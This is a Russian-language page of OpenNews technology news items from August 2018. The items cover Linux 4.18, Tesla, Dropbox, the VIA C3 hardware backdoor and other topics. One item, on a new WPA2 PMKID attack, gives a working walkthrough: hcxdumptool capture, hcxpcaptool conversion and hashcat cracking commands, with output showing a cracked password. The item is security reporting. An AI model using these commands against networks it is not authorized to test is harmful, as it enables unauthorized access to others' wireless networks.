    • В DRM-драйвере Intel включена поддержка чипов Icelake (ICL), проведён рефакторинг кода GuC/HuC и DPLL, включена поддержка NV12 и PSR/PSR2;
    • В драйвере amdkfd для dGPU (дискретные GPU, такие как Fiji, Tonga, Polaris) добавлена поддержка GPU GFX9;
    • Добавлен новый DRM-драйвер v3d для оборудования Broadcom V3D V3.x+;
    • Добавлен драйвер xen-front с реализаций графического фронтэнда для гостевых систем XEN в режиме паравиртуализации (PV);
    • Добавлена поддержка SoC Qualcomm Snapdragon 845, применяемого в новейших мобильных устройствах класса high-end;
    • Добавлена поддержка игровых контроллеров Steam от компании Valve;

Одновременно Латиноамериканский Фонд свободного ПО сформировал вариант полностью свободного ядра 4.18 - Linux-libre 4.18-gnu, очищенного от элементов прошивок и драйверов, содержащих несвободные компоненты или участки кода, область применения которых ограничена производителем. В новом выпуске представлен новый интерфейс для загрузки прошивок (firmware_reject_nowarn), не выводящий предупреждения в случае если прошивка не найдена. Добавлена чистка блобов для драйверов psp-dev и icn8505. Обновлён код чистки блобов в драйверах c3xxx, c62x, dvb-usb, dvb-usb-v2, iwlwifi, ks7010, ath10k, andgpu, i915, tg3, silead и ca0132. Прекращена чистка блобов для atom isp. Проверены ассемблерные файлы, вынесенные из основного кода amdkfd.

  1. Главная ссылка к новости
  2. OpenNews: Релиз ядра Linux 4.17
  3. OpenNews: Релиз ядра Linux 4.16
  4. OpenNews: Релиз ядра Linux 4.15
  5. OpenNews: Релиз ядра Linux 4.14
  6. OpenNews: Релиз ядра Linux 4.13
Обсуждение (149 +41) | Тип: Программы | Интересно
13.08.2018 Компания Tesla намерена открыть код систем обеспечения безопасности (76 +18)
  Илон Маск сообщил о намерении перевести в разряд открытого ПО компоненты, применяемые для обеспечения безопасности автомобилей Tesla с автономным управлением. Никаких деталей и сроков пока не называется, но упоминается мотив - желание повысить безопасность всех беспилотных автомобилей. По мнению Маска, предложенный код сможет применяться и другими производителями для повышения безопасности своих систем.

  1. Главная ссылка к новости
  2. OpenNews: Компания Tesla частично опубликовала GPL-код для формирования системного окружения
  3. OpenNews: Незащищённый хост компании Tesla был использован для майнинга криптовалюты
  4. OpenNews: Продемонстрирован запуск Gentoo в окружении информационной системы автомобиля Tesla
  5. OpenNews: Компания Tesla Motors разрешила использование своих патентов всем желающим
  6. OpenNews: Энтузиасты провели обратный инжиниринг логов электромобиля Tesla Roadster
Обсуждение (76 +18) | Тип: К сведению |
13.08.2018 Представлен порт Qt 1 для современных систем (85 +26)
  Участники команды KDE Restoration Project, ведущие работу по портированию KDE 1 и KDE 2 для работы в современных дистрибутивах, выполнили портирование библиотеки Qt 1, переведённой на сборку с использованием Cmake. Работающий на современных системах порт Qt 1 опубликован на GitHub. Конечной целью проекта является предоставление возможности запуска полноценного рабочего стола KDE 1.

  1. Главная ссылка к новости
  2. OpenNews: Проект KDE отметил своё двадцатилетие повторным выпуском KDE 1
  3. OpenNews: Релиз десктоп-окружения Trinity 3.5.13, продолжающего развитие KDE 3.5
  4. OpenNews: Проект по портированию KDE 2 для работы в современных дистрибутивах
Обсуждение (85 +26) | Тип: К сведению |
12.08.2018 Новая техника атаки на беспроводные сети с WPA2 (62 +16)
  Йенс Штойбе (Jens "atom" Steube), создатель программы для подбора паролей hashcat, представил новую технику атаки на беспроводные сети с аутентификацией на базе механизмов WPA или WPA2. Предложенный метод существенно упрощает получение идентификатора, который затем может быть использован для подбора пароля подключения к беспроводной сети.

Атака применима к любым сетям 802.11i/p/q/r с включенным румингом (поддерживается на большинстве современных точек доступа). Суть метода в возможности получения идентификатора PMKID (Pairwise Master Key Identifier) в составе ответа EAPOL на запрос аутентификации (PMKID указывается в опциональном поле RSN IE (Robust Security Network Information Element)). Наличие PMKID позволяет определить разделяемый ключ PSK (Pre-Shared Key, пароль к беспроводной сети) без непосредственного получения вычисленного на его основе PMK (Pairwise Master Key), передаваемого на этапе согласования соединения при успешной аутентификации нового пользователя. В частности, PMKID вычисляется по формуле "HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)". Так как MAC-адреса и строка с названием сети изначально известны, не составляет труда применять PMKID вместо PMK в качестве признака успешного подбора пароля.

Атаки по подбору паролей на основе перехваченных кадров не новы, но в отличие от ранее применяемых методов новая атака не требует ожидания подключения к сети нового пользователя и сохранения всей активности, связанной с установкой им соединения. Для получения данных, достаточных для начала подбора пароля, новый метод требует перехвата лишь одного кадра, который можно получить в любое время, отправив запрос аутентификации к точке доступа. Подобная особенность существенно упрощает получение данных для начала подбора, но в целом успешность атаки как и раньше зависит от стойкости установленного пароля к подбору по словарю.

Отмечается, что большинство пользователей не утруждают себя установкой стойких к подбору паролей подключения к беспроводной сети или используют генерируемые точкой доступа пароли, которые на первый взгляд являются стойкими, но на деле формируются на основе предсказуемых шаблонов. Подобные пароли достаточно эффективно подбираются при знании информации о производителе точки доступа, которую можно получить, например, проанализировав MAC-адрес и ESSID. Время подбора подобных 10-символьных паролей оценивается примерно в 8 дней на системе с 4 GPU.

Для проведения атаки требуются свежие версии hcxdumptool, hcxtools и hashcat.

Запускаем hcxdumptool, отправляем запрос к точке доступа для получения PMKID и сохраняем результат в файл в формате pcapng


   ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

    start capturing (stop with ctrl+c)
    INTERFACE:...............: wlp39s0f3u4u5
    FILTERLIST...............: 0 entries
    MAC CLIENT...............: 89acf0e761f4 (client)
    MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
    EAPOL TIMEOUT............: 20000
    DEAUTHENTICATIONINTERVALL: 10 beacons
    GIVE UP DEAUTHENTICATIONS: 20 tries
    REPLAYCOUNTER............: 62083
    .... 
    [13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e  [ASSOCIATIONREQUEST, SEQUENCE 4]
    [13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
    [13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]

В случае если точка доступа поддерживает отправку PMKID будет выведено сообщение "FOUND PMKID". Из-за помех перехват может не получиться с первого раза, поэтому рекомендуется запускать hcxdumptool в течение приблизительно 10 минут.

Запускаем утилиту hcxpcaptool для преобразования перехваченного дампа из формата pcapng в формат для разбора в hashcat.


   ./hcxpcaptool -z test.16800 test.pcapng

    start reading from test.pcapng

    summary:
    --------
    file name....................: test.pcapng
    file type....................: pcapng 1.0
    file hardware information....: x86_64
    file os information..........: Linux 4.17.11-arch1
    file application information.: hcxdumptool 4.2.0
    network type.................: DLT_IEEE802_11_RADIO (127)
    endianess....................: little endian
    read errors..................: flawless
    packets inside...............: 66
    skipped packets..............: 0
    packets with FCS.............: 0
    beacons (with ESSID inside)..: 17
    probe requests...............: 1
    probe responses..............: 11
    association requests.........: 5
    association responses........: 5
    authentications (OPEN SYSTEM): 13
    authentications (BROADCOM)...: 1
    EAPOL packets................: 14
    EAPOL PMKIDs.................: 1

    1 PMKID(s) written to test.16800

Содержимое записанного файла включает строки вида "2582a81d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465af3a", которые содержат шестнадцатеричные значения PMKID, MAC AP,MAC Station и ESSID.

Дополнительно при запуске hcxpcaptool можно использовать опции "-E", "-I" и '-U" для анализа наличия паролей, идентификаторов и имён пользователей в беспроводном трафике:


   ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

Запускаем hashcat для подбора пароля (применяется режим 16800):


   ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

    hashcat (v4.2.0) starting...

    OpenCL Platform #1: NVIDIA Corporation
    ======================================
    * Device #1: GeForce GTX 1080, 2028/8112 MB allocatable, 20MCU
    * Device #2: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
    * Device #3: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
    * Device #4: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU

    Hashes: 1 digests; 1 unique digests, 1 unique salts
    Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

    Applicable optimizers:
    * Zero-Byte
    * Single-Hash
    * Single-Salt
    * Brute-Force
    * Slow-Hash-SIMD-LOOP

    Minimum password length supported by kernel: 8
    Maximum password length supported by kernel: 63

    Watchdog: Temperature abort trigger set to 90c

    2582573161c61*4604d4e*89acf0e761f4*ed4824639f3a:hashcat!

    Session..........: hashcat
    Status...........: Cracked
    Hash.Type........: WPA-PMKID-PBKDF2
    Hash.Target......: 2582a8281d0e61c61*4604ba734d4e*89acf...a39f3a
    Time.Started.....: Sun Aug 12 12:51:38 2018 (41 secs)
    Time.Estimated...: Sun Aug 12 12:52:19 2018 (0 secs)
    Guess.Mask.......: ?l?l?l?l?l?lt! [8]
    Guess.Queue......: 1/1 (100.00%)
    Speed.Dev.#1.....:   408.9 kH/s (103.86ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#2.....:   408.6 kH/s (104.90ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#3.....:   412.9 kH/s (102.50ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#4.....:   410.9 kH/s (104.66ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#*.....:  1641.3 kH/s
    Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
    Progress.........: 66846720/308915776 (21.64%)
    Rejected.........: 0/66846720 (0.00%)
    Restore.Point....: 0/11881376 (0.00%)
    Candidates.#1....: hariert! -> hhzkzet!
    Candidates.#2....: hdtivst! -> hzxkbnt!
    Candidates.#3....: gnxpwet! -> gwqivst!
    Candidates.#4....: gxhcddt! -> grjmrut!
    HWMon.Dev.#1.....: Temp: 81c Fan: 54% Util: 75% Core:1771MHz Mem:4513MHz Bus:1
    HWMon.Dev.#2.....: Temp: 81c Fan: 54% Util:100% Core:1607MHz Mem:4513MHz Bus:1
    HWMon.Dev.#3.....: Temp: 81c Fan: 54% Util: 94% Core:1683MHz Mem:4513MHz Bus:1
    HWMon.Dev.#4.....: Temp: 81c Fan: 54% Util: 93% Core:1620MHz Mem:4513MHz Bus:1


  1. Главная ссылка к новости
  2. OpenNews: Программа подбора паролей hashcat стала открытой
  3. OpenNews: OpenBSD отключает WEP и WPA1 по умолчанию
  4. OpenNews: Атака против WPA2, позволяющая перехватить трафик в WiFi-сети
  5. OpenNews: Опубликована технология защиты беспроводных сетей WPA3
  6. Проверка безопасности беспроводной сети WPA/WPA2 при помощи Aircrack-ng и Hashcat
Обсуждение (62 +16) | Тип: Проблемы безопасности |
12.08.2018 Dropbox прекращает поддержку всех ФС в Linux, за исключением Ext4 (187 –20)
  Обладатели десктоп-клиента для работы с облачным сервисом Dropbox получили увеломление о скором прекращении поддержки синхронизации данных с облаком в случае использования файловых систем, отличных от Ext4. Начиная с 7 ноября синхронизация содержимого каталогов с Dropbox станет невозможной, например, при использовании многослойных или шифрованных разделов (в том числе eCryptfs поверх ext4) или файловых систем XFS, ZFS и Btrfs.

Причина такого решения остаётся до конца не ясной, в комментариях от представителей Dropbox упоминается лишь необходимость поддержки в ФС расширенных атрибутов/Xattrs, но многие пользователи находят данный довод неубедительным, так как все основные Linux ФС поддерживают расширенные атрибуты и нет явных факторов, которые бы подталкивали к привязке к Ext4.

  1. Главная ссылка к новости
  2. OpenNews: Dropbox прекращает разработку Pyston. Опубликован финальный выпуск 0.6.1
  3. OpenNews: Утечка учётных записей 68 млн пользователей Dropbox
  4. OpenNews: Dropbox опубликовал реализацию алгоритма сжатия изображений Lepton
  5. OpenNews: Успехи Rust: Подготовка первого выпуска Servo и использование Rust в новом хранилище Dropbox
  6. OpenNews: Dropbox открыл код платформы группового обмена сообщениями Zulip
Обсуждение (187 –20) | Тип: Тема для размышления |
11.08.2018 Заявлено об обнаружении бэкдора в процессорах VIA C3 (104 +53)
  Кристофер Домас (Christopher Domas) представил на конференции Black Hat 2018 отчёт с анализом возможных бэкдоров в ноутбуках, ПК и встраиваемых моделях процессоров на базе архитектуры x86. В том числе продемонстрирован рабочий эксплоит, активирующий аппаратный бэкдор в процессорах VIA, позволяющий из третьего кольца защиты выполнить код с привилегиями нулевого кольца через выполнение определённой последовательности машинных инструкций. Бэкдор присутствует только в линейке процессоров VIA C3, в более новых моделях проблема не проявляется.

Обычно бэкдор деактивирован и требует для активации наличие доступа к нулевому кольцу защиты, но исследователь обнаружил, что на некоторых системах по умолчанию бэкдор активен и может применяться для модификации непривилегированным пользователем любых областей памяти, в том числе памяти ядра. Для проверки своих систем на предмет наличия бэкдора и его отключения, а также для анализа других возможных бэкдоров в процессорах подготовлен набор утилит и модулей ядра.

Бэкдор представляет собой дополнительное вычислительное ядро, встроенное в процессор в дополнение к основному ядру CPU. Если основное процессорное ядро обеспечивает выполнение инструкций x86, то бэкдор оформлен как сопроцессор со своим набором инструкций. Включение и выключение сопроцессора с бэкдором производится через установку специального управляющего бита через регистр MSR (model-specific-register) с последующим выполнением специальной процессорной инструкции.

После активации появляется возможность выполнения инструкций на сопроцессоре, не ограниченных текущей системой привилегий основного процессора (проверка привилегий не выполняется) и работая в обход механизма защиты памяти. Передача команд для выполнения на сопроцессоре осуществляется через инкапсуляцию в специально оформленные x86 инструкции "bound".

Отмечается, что выявленный бэкдор, которому присвоено кодовое имя "rosenbridge", кардинально отличается от таких технологий, как ME (Management Engine) или PSP (Platform Security Processor), так как он более глубоко встроен, чем любой известный сопроцессор и имеет доступ не только ко всей памяти процессора, но и к процессорным регистрам и конвейеру выполнения.

  1. Главная ссылка к новости
  2. OpenNews: Компания AMD подтвердила наличие уязвимостей в своих чипах
  3. OpenNews: Уязвимость в процессорах AMD, позволяющая получить контроль над TPM-окружением
  4. OpenNews: Выявлена скрытая возможность отключения подсистемы Intel ME
  5. OpenNews: Эндрю Таненбаум поблагодарил Intel за использование MINIX в прошивке Management Engine 11
  6. OpenNews: Серия критических уязвимостей в Intel Management Engine
Обсуждение (104 +53) | Тип: Проблемы безопасности |
10.08.2018 Инициатива по развитию открытого ПО для киноиндустрии (94 +28)
  Академия кинематографических искусств и наук и Linux Foundation учредили новую организацию Academy Software Foundation, которая нацелена на продвижение использования открытого ПО в процессах создания фильмов. В состав новой организации вошли такие компании, как Animal Logic, Autodesk, Blue Sky Studios, Cisco, DNEG, DreamWorks, Epic Games, Foundry, Google Cloud, Intel, SideFX, Walt Disney Studios и Weta Digital.

Сообща данные компании намерены продвигать открытое ПО, помогать студиям в вопросах с применением открытых лицензий, управлять совместными открытыми проектами и развивать открытые технологии для создания изображений, визуальных эффектов, анимации и звука. Создание Academy Software Foundation стало итогом двухлетней совместной работы Киноакадемии и Linux Foundation, в ходе которой был проанализирован опыт применения открытого ПО в Голливуде. В результате стало ясно, что 80% голливудских студий и вовлечённых в киноиндустрию компаний применяют открытое ПО для решений тех или иных задач.

Ключевые цели Academy Software Foundation:

  • Предоставление нейтральной площадки для координации взаимодействия между разными проектами, обмена ресурсами и накопления передового опыта в областях, связанных с медиаиндустрией и кинопроизводством;
  • Разработка открытой платформы непрерывной интеграции и сборочной инфраструктуры для создания эталонных сборок и упрощения выявления проблем;
  • Предоставление независимым разработчикам и компаниям простого пути для участия в разработке и передаче кода;
  • Оптимизация разработки сборочных и runtime окружений, благодаря созданию типовых сборочных конфигураций, скриптов и рекомендаций;
  • Обеспечение качества и совместимости применяемых лицензий за счёт разработки типовых схем лицензирования.

  1. Главная ссылка к новости
Обсуждение (94 +28) | Тип: К сведению |
10.08.2018 Выпуск децентрализованного коммуникационного клиента Ring-KDE 3.0.0 (69 +22)
  Представлен релиз Ring-KDE 3.0.0, альтернативной реализации клиента децентрализованной коммуникационной платформы Ring, развиваемой проектом KDE на базе технологий KDE (основной клиент Ring базируется на GTK+). Для загрузки подготовлены самодостаточные сборки в формате AppImage.

Новая версия Ring-KDE по сути является новым полностью переписанным приложением, предлагающим иной интерфейс пользователя и построенным на базе более современных технологий, таких как QtQuick2 и адаптивный набор виджетов KDE Kirigami. В новой версии также обеспечена полноценная поддержка управления с сенсорных экранов.

В интерфейсе совершения звонка добавлено отображение наиболее релевантных адресатов по мере набора имени абонента. Добавлена поддержка вызова сразу нескольких абонентов, перевода звонка в режим ожидания и создания архивной записи разговора. Существенно улучшена поддержка видеозвонков, предоставления совместного доступа к экрану и передачи файлов.

Помимо лога в форме чата представлена концепция навигации по шкале времени, позволяющая просматривать историю голосовых вызовов, видеозвонков, сообщений и другой активности пользователя. Центральным звеном системы навигации теперь является поисковая строка, позволяющая быстро найти адресата по части его имени. По умолчанию изменения и содержимое личной адресной книги сохраняется только на локальной системе и не передаётся в облако. Имеется опция для кэширования содержимого глобальной адресной книги.

Также можно отметить новый выпуск основной платформы Ring, в котором добавлены функции записи видео- и аудиовызовов, реализована поддержка push-уведомлений, проведена работа по улучшению качества, безопасности и стабильности. Напомним, что платформа Ring позволяет передавать сообщения без обращения к внешним серверам через организацию прямого P2P-соединения между пользователями с применением оконечного шифрования (End-to-end, ключи присутствуют только на стороне клиента) и аутентификации на основе сертификатов X.509.

Поддерживается защищённый обмен сообщениями, голосовые и видео-звонки, телеконференции, отправка файлов, совместный доступ к файлам и содержимому экрана. Для идентификации пользователя в Ring применяется децентрализованный глобальный механизм аутентификации учётных записей, основанный на реализации адресной книги в форме блокчейна (применяются наработки проекта Ethereum). Для адресации пользователей в Ring применяется протокол OpenDHT (распределённая хэш таблица), без применения централизованных реестров c информацией о пользователях.

  1. Главная ссылка к новости
  2. OpenNews: Выпуск децентрализованного коммуникационного клиента Ring 1.0
  3. OpenNews: Децентрализованный коммуникационный клиент Ring присоединился к проекту GNU
  4. OpenNews: Доступна система обмена сообщениями Briar, способная работать в режиме P2P
  5. OpenNews: Проект Tox развивает свободную альтернативу Skype
  6. OpenNews: Завершено открытие серверной части сервиса мгновенного обмена сообщениями Wire
Обсуждение (69 +22) | Тип: Программы |
<< Предыдущая страница (позже)
Следующая страница (раньше) >>


  Закладки на сайте
  Проследить за страницей
Created 1996-2018 by Maxim Chirkov  
ДобавитьПоддержатьВебмастеруГИД  
Hosting by Ihor